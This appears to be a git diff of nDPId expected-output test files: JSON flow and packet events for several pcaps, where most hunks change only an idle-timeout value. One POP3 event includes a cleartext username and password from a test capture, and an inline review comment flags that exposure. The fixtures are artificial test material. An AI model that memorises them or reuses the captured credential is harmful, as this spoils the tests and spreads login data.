+01151{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1648373359662,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1648373359662,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItyItAAEAGdBXAqAGAaBHR8K7iAbvIMdGkN9JuFlAYAfapQAAAFgMBAgABAAH8AwNnKyM21\/SbS3Q02cIKvbAgcmV67HQB0KXsoOxxl9v++yDRdtN3P07Qel84K9CWVDBxLwdJHbn9d9oomO2+9M0CRgAgenoTARMCEwPAK8AvwCzAMMypzKjAE8AUAJwAnQAvADUBAAGTenoAAAAAAD4APAAAOXpuNnF6cTZjYWF1Y3VkZXNyLXBsdXJhbHNpZ2h0LnNpdGVpbnRlcmNlcHQucXVhbHRyaWNzLmNvbQAXAAD\/AQABAAAKAAoACLq6AB0AFwAYAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAANABIAEAQDCAQEAQUDCAUFAQgGBgEAEgAAADMAKwApuroAAQAAHQAgm5zCzvNJzsWd1VyD4DXwZiQmlSanX10JAobLY4rSfTUALQACAQEAKwAHBsrKAwQDAwAbAAMCAAJEaQAFAAMCaDJaWgABAAAVAJ4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1648373359646,"flow_last_seen":1648373359662,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1648373359662,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.17.209.240","src_port":44770,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zn6qzq6caaucudesr-pluralsight.siteintercept.qualtrics.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} +00990{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648373359646,"flow_last_seen":1648373359681,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.17.209.240","src_port":44770,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"zn6qzq6caaucudesr-pluralsight.siteintercept.qualtrics.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1648373359646,"flow_last_seen":1648373359681,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.17.209.240","src_port":44770,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1648373358908,"flow_last_seen":1648373359037,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5045,"flow_avg_l4_payload_len":560,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.203.201.56","src_port":42618,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"}} 
+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1648373359576,"flow_last_seen":1648373359621,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.19.162.127","src_port":48948,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1648373357854,"flow_last_seen":1648373357906,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":5613,"flow_avg_l4_payload_len":623,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42782,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"}} 
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1648373357861,"flow_last_seen":1648373357922,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":5613,"flow_avg_l4_payload_len":623,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42790,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1648373355763,"flow_last_seen":1648373356334,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6491,"flow_avg_l4_payload_len":721,"midstream":0,"thread_ts_msec":1648373359681,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"54.69.188.18","src_port":42642,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"}} 00559{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":44,"source":"pluralsight.pcap","alias":"nDPId-test","packets-captured":44,"packets-processed":44,"total-skipped-flows":0,"total-l4-data-len":26716,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":10,"total-updates":0,"current-active-flows":0,"total-active-flows":6,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":49,"global_ts_msec":1648373359681} ~~~~~~~~~~~~~~~~~~~~ SUMMARY 
~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 44/44 diff --git a/test/results/pop3.pcap.out b/test/results/pop3.pcap.out index 6318b1f5e..5dfec9c8e 100644 --- a/test/results/pop3.pcap.out +++ b/test/results/pop3.pcap.out 
@@ -1,11 +1,11 @@ 00455{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"pop3.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00541{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"pop3.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1349776771892} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"pop3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1349776771892,"flow_last_seen":1349776771892,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1349776771892,"l3_proto":"ip4","src_ip":"143.225.229.181","dst_ip":"74.208.5.28","src_port":35287,"dst_port":110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"pop3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1349776771892,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1349776771892,"pkt":"ABffs8QAAMCfw1sHCABFEAA8\/wtAAEAGdh2P4eW1StAFHInXAG5gksK3AAAAAKACFtDFsQAAAgQFtAQCCAoAYD28AAAAAAEDAwY="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"pop3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1349776772030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1349776772030,"pkt":"AMCfw1sHABffs8QACABFAAA8AABAADUGgDlK0AUcj+HltQBuidcdXnV7YJLCuKASFqDzqQAAAgQFtAQCCApTpKX2AGA9vAEDAwk="} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"pop3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1349776772030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1349776772030,"pkt":"ABffs8QAAMCfw1sHCABFEAA0\/wxAAEAGdiSP4eW1StAFHInXAG5gksK4HV51fIAQAFzFqQAAAQEICgBgPkZTpKX2"} -00817{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"pop3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1349776771892,"flow_last_seen":1349776780730,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1349776780730,"l3_proto":"ip4","src_ip":"143.225.229.181","dst_ip":"74.208.5.28","src_port":35287,"dst_port":110,"l4_proto":"tcp","ndpi": {"flow_risk": 
{"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"POP3","breed":"Unsafe","category":"Email"},"pop": {"user":"cicciopernacchio@mail.com","password":"pippozzo"}} -00792{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":31,"source":"pop3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1349776771892,"flow_last_seen":1349776799209,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1853,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1349776799209,"l3_proto":"ip4","src_ip":"143.225.229.181","dst_ip":"74.208.5.28","src_port":35287,"dst_port":110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"POP3","breed":"Unsafe","category":"Email"}} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"pop3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1349776771892,"flow_last_seen":1349776771892,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1349776771892,"l3_proto":"ip4","src_ip":"143.225.229.181","dst_ip":"74.208.5.28","src_port":35287,"dst_port":110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"pop3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1349776771892,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1349776771892,"pkt":"ABffs8QAAMCfw1sHCABFEAA8\/wtAAEAGdh2P4eW1StAFHInXAG5gksK3AAAAAKACFtDFsQAAAgQFtAQCCAoAYD28AAAAAAEDAwY="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"pop3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1349776772030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1349776772030,"pkt":"AMCfw1sHABffs8QACABFAAA8AABAADUGgDlK0AUcj+HltQBuidcdXnV7YJLCuKASFqDzqQAAAgQFtAQCCApTpKX2AGA9vAEDAwk="} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"pop3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1349776772030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1349776772030,"pkt":"ABffs8QAAMCfw1sHCABFEAA0\/wxAAEAGdiSP4eW1StAFHInXAG5gksK4HV51fIAQAFzFqQAAAQEICgBgPkZTpKX2"} +00817{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"pop3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1349776771892,"flow_last_seen":1349776780730,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1349776780730,"l3_proto":"ip4","src_ip":"143.225.229.181","dst_ip":"74.208.5.28","src_port":35287,"dst_port":110,"l4_proto":"tcp","ndpi": {"flow_risk": 
{"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"POP3","breed":"Unsafe","category":"Email"},"pop": {"user":"cicciopernacchio@mail.com","password":"pippozzo"}} +00792{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":31,"source":"pop3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1349776771892,"flow_last_seen":1349776799209,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1853,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1349776799209,"l3_proto":"ip4","src_ip":"143.225.229.181","dst_ip":"74.208.5.28","src_port":35287,"dst_port":110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"POP3","breed":"Unsafe","category":"Email"}} 00549{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":31,"source":"pop3.pcap","alias":"nDPId-test","packets-captured":31,"packets-processed":31,"total-skipped-flows":0,"total-l4-data-len":1853,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1349776799209} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 31/31 diff --git a/test/results/pops.pcapng.out b/test/results/pops.pcapng.out index 453a35e46..fde9e9d28 100644 --- a/test/results/pops.pcapng.out +++ b/test/results/pops.pcapng.out 
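Review bot: The regenerated `detected` event for pop3.pcap still serializes `"pop": {"user":"cicciopernacchio@mail.com","password":"pippozzo"}`, so this expected output pins a cleartext POP3 password as part of the JSON event stream. The only value this hunk changes is `flow_idle_time` (7440000 to 7560000, now equal to the `tcp-max-idle-time` in the init event), so the credential field predates this commit. Every consumer of the stream, and every log or SIEM index that stores it, receives the password alongside the flow metadata. Consider masking the value at serialization or emitting it only behind an explicit option, so that this golden line would read `"password":"<masked>"` (placeholder; the serializer is outside this hunk). Until then, deployments should presumably treat the collector socket and its stored output as credential-bearing data.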
@@ -1,11 +1,11 @@ 00457{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"pops.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"pops.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1614938117011} -00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"pops.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614938117011,"flow_last_seen":1614938117011,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614938117011,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"10.10.10.1","src_port":55077,"dst_port":995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"pops.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614938117011,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1614938117011,"pkt":"AAAAAAAAAAgACwgJCABFAAA0BaxAAH8GIWTAqAABCgoKAdclA+N8RI7kAAAAAIACIACU+AAAAgQE7AEDAwIBAQQC"} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"pops.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614938117270,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1614938117270,"pkt":"AAAAAAAAAAgACwgJCABFAAA0AABAADMGcxAKCgoBwKgAAQPj1yVpzHIcfESO5YASchBmIQAAAgQFtAEBBAIBAwMH"} -00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"pops.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614938117298,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":238,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":238,"pkt_l4_len":204,"thread_ts_msec":1614938117298,"pkt":"AAAAAAAAAAgACwgJCABFAADgBbBAAH8GILTAqAABCgoKAdclA+N8RI7lacxyHVAYQTecFQAAFgMDALMBAACvAwNgQf\/5kgLNNRPYdtFiHEoPzfeU37\/0FcJ+JWxvuPQRAgAAOMAowCfAFMATAJ8AngA5ADMAnQCcAD0APAA1AC\/ALMArwCTAI8AKwAkAagBAADgAMgAKABMABQAEAQAATgAAABkAFwAAFHBvcC5zZWN1cmVzZXJ2ZXIubmV0AAoABgAEABcAGAALAAIBAAANABQAEgYBBgMEAQUBAgEEAwUDAgMCAgAXAAD\/AQABAA=="} 
-00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"pops.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1614938117011,"flow_last_seen":1614938117298,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1614938117298,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"10.10.10.1","src_port":55077,"dst_port":995,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"POPS","breed":"Safe","category":"Email"}} -00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"pops.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1614938117011,"flow_last_seen":1614938117559,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":2704,"flow_avg_l4_payload_len":540,"midstream":0,"thread_ts_msec":1614938117559,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"10.10.10.1","src_port":55077,"dst_port":995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"POPS","breed":"Safe","category":"Email"}} 
+00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"pops.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614938117011,"flow_last_seen":1614938117011,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614938117011,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"10.10.10.1","src_port":55077,"dst_port":995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"pops.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614938117011,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1614938117011,"pkt":"AAAAAAAAAAgACwgJCABFAAA0BaxAAH8GIWTAqAABCgoKAdclA+N8RI7kAAAAAIACIACU+AAAAgQE7AEDAwIBAQQC"} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"pops.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614938117270,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1614938117270,"pkt":"AAAAAAAAAAgACwgJCABFAAA0AABAADMGcxAKCgoBwKgAAQPj1yVpzHIcfESO5YASchBmIQAAAgQFtAEBBAIBAwMH"} 
+00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"pops.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614938117298,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":238,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":238,"pkt_l4_len":204,"thread_ts_msec":1614938117298,"pkt":"AAAAAAAAAAgACwgJCABFAADgBbBAAH8GILTAqAABCgoKAdclA+N8RI7lacxyHVAYQTecFQAAFgMDALMBAACvAwNgQf\/5kgLNNRPYdtFiHEoPzfeU37\/0FcJ+JWxvuPQRAgAAOMAowCfAFMATAJ8AngA5ADMAnQCcAD0APAA1AC\/ALMArwCTAI8AKwAkAagBAADgAMgAKABMABQAEAQAATgAAABkAFwAAFHBvcC5zZWN1cmVzZXJ2ZXIubmV0AAoABgAEABcAGAALAAIBAAANABQAEgYBBgMEAQUBAgEEAwUDAgMCAgAXAAD\/AQABAA=="} +00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"pops.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1614938117011,"flow_last_seen":1614938117298,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1614938117298,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"10.10.10.1","src_port":55077,"dst_port":995,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"POPS","breed":"Safe","category":"Email"}} 
